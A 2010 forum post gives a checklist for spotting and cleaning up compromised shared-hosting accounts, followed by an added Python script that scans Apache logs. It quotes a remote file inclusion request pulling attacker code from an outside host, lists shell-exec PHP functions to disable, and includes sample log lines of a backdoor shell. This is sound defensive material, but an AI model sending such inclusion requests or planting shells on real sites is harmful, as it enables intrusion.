
Cracked Account Checklist



ifurniss
11-15-2010, 06:58 PM
I frequently clean cracked WestHost accounts, but sometimes they are not cracked, or it's a little hard to track down.
Here is a guide to what to look for if you think something might be compromised. It is written mostly for WestHost 3.0 accounts, but much of it translates to other systems and hosts.

1. Location, Location, Location: Where is the malicious content initially found? 9 times out of 10 it'll be in a subdirectory of a specific PHP application, and that application is usually the one that was exploited.

2. PHP settings. Below are commonly exploited PHP functions and settings. Ensure the three settings below are Off if at all possible [or enabled only for the directory that needs them].

Quick check of /etc/php.ini variables

disable_functions = passthru,proc_open,shell_exec,system   ; ensure these are in the list (php.ini comments start with ";")
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off

3. Modification dates: What are the modification times on the files? This is very important, as it tells you how old the hack is. If you know when it was put there, you can examine the log files for anything suspicious around that time.

4. Got POST? Look for the pages that have been POSTed to the most in the Apache logs. If there is a backdoor shell, it will typically show up near the top of that list.

5. Check for strange files in /tmp. This is a common location for crackers to stick scripts.

6. Check your process list for anything suspicious. If you see something, either install lsof and look at where it's executing from, or contact us to check for you.

7. Know your log files. Do you know how to enable FTP logs? Where they are kept? bash_history? access_logs? error_logs? Check them all.

8. Run the command below and look for any strange GET requests. A query string that passes a full URL to a script parameter, as in the example, is the classic remote file inclusion pattern.

awk -F '"' '{print $2}' /var/log/httpd/access_log | grep -F '?' | less   # request lines that carry a query string

Example: GET /domain.html/default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt?? HTTP/1.1
GET /default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt??

9. Document: Always document everything you've seen and everything you find and everything you do.

10. Google's your friend. Chances are that if someone has been hacked, it's happened a million times over to others running the same application. Typically there are posts on possible entry points, etc.

11. Repetition, repetition, repetition. Hackers like to repeat things. Why? Because they use scripts to do their work for them. So if you find one instance, check for others in other files.

This list could be expanded, but these steps are good places to start if you are worried about your account's security.
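Steps 4 and 8 above can be done in one pass over the access log. The script below is an added example, not part of the original post or of WestHost's tooling: it counts POST targets and flags GET requests whose query string hands a remote URL to a script parameter (the theme.php request from step 8 is included; the other log lines, IP addresses and paths are constructed sample data).

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Nov/2010:18:10:01 -0500] "GET /news.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Nov/2010:18:10:07 -0500] "GET /default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt?? HTTP/1.1" 200 812 "-" "libwww-perl/5.8"
198.51.100.9 - - [15/Nov/2010:18:11:32 -0500] "POST /images/.cache/sh.php HTTP/1.1" 200 311 "-" "Mozilla/4.0"
198.51.100.9 - - [15/Nov/2010:18:11:40 -0500] "POST /images/.cache/sh.php HTTP/1.1" 200 298 "-" "Mozilla/4.0"
198.51.100.9 - - [15/Nov/2010:18:12:02 -0500] "POST /images/.cache/sh.php HTTP/1.1" 200 305 "-" "Mozilla/4.0"
192.0.2.77 - - [15/Nov/2010:18:13:15 -0500] "POST /contact.php HTTP/1.1" 302 0 "http://example.test/contact.php" "Mozilla/5.0"
192.0.2.77 - - [15/Nov/2010:18:14:00 -0500] "GET /wrap.php?url=http%3A%2F%2F198.51.100.9%2Fx.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

# Request line between the quotes: method, target (path + query), protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def parse_requests(log_text):
    """Yield (method, target) for each parsable log line; skip the rest."""
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            yield m.group("method"), m.group("target")

def top_post_targets(log_text, n=5):
    """Step 4: paths that receive the most POST requests (a busy shell stands out)."""
    counts = Counter(urlsplit(t).path for meth, t in parse_requests(log_text) if meth == "POST")
    return counts.most_common(n)

def remote_include_gets(log_text):
    """Step 8: GET requests whose query string passes a remote URL in a parameter value.
    parse_qsl percent-decodes once, so encoded http%3A%2F%2F... values are caught too."""
    hits = []
    for meth, target in parse_requests(log_text):
        if meth != "GET":
            continue
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append((name, target))
                break
    return hits

if __name__ == "__main__":
    for path, count in top_post_targets(SAMPLE_LOG):
        print(f"{count:4d} POST {path}")
    for name, target in remote_include_gets(SAMPLE_LOG):
        print(f"remote URL in parameter {name}: {target}")
```

Replace SAMPLE_LOG with the contents of /var/log/httpd/access_log to run it against a real account; a parameter that legitimately accepts URLs will also be listed, so treat the output as leads to check, not verdicts.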